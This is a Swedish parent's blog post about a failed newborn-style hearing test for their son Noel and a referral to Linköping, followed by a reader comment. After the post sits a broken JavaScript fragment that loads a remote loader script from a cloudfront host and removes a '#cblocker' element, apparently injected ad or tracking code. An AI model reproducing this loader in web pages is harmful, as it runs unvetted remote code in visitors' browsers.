Hörselundersökningen

I fredags var det således dags för ett nytt försök att göra hörselundersökning, ni vet det där som man i regel gör på sina barn när de är nyfödda. Sist var Noel kanske 3-4 månader gammal och hade både hjärtsvikt och var rejält förkyld, det gick med andra ord inget vidare. Mitt hoppas tändes dock i fredags när han somnade inne i undersökningsrummet, då tänkte jag att det här det kommer gå kanon, som en dans. Men så fel jag hade. Undersökningen gav inga utslag alls och blev alltså underkänd. Det är nog inte det att Noel inte hör, för det gör han verkligen, utan det berodde säkert på den mängd vax som han har i sina öron, han kliar ofta i öronen och läkarna säger ofta att det är för mycket vax för att kunna se bra in i öronen. Det räcker alltså med lite, lite vax, en liten förkylning eller joller för att undersökningen inte ska lyckas.

Vi blev remitterade till Linköping för att göra ett annat slags test med elektroner istället. Hörseln känns på något sätt viktigare än synen med tanke på språkutveckling och kommunikation, så har Noel en hörselnedsättning så känns det extremt viktigt att få reda på det och ge honom hjälp med en gång. Anledningen till att vi är så ”noga” med att undersöka ögon och öron ordentligt är så enkel som att de flesta barn med kromosomavvikelser oftast har något problem med syn och hörsel, det behöver dock inte vara något stort och omfattande, något brytningsfel och kanske lite nedsatt hörsel på något öra, eller trånga hörselgångar som ofta blir vätskefyllda och på så vis påverka hörseln.

Får se när vi får en ny tid till Linköping, förhoppningsvis blir det innan sommaren, annars lär det inte bli av fören till hösten.

// -1?’https':’http';var ccm=document.createElement(‘script’);ccm.type=’text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};
// ]]>

blogstats trackingpixel

En reaktion på “Hörselundersökningen

  1. Skriv din kommentar här!

    oj, vilken störtskön koncentrerad liten kille.
    jättespännande leksak verkar det vara.

    trevlig skön helg önskar jag er.

Kommentera

E-postadressen publiceras inte. Obligatoriska fält är märkta *

Följande HTML-taggar och attribut är tillåtna: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>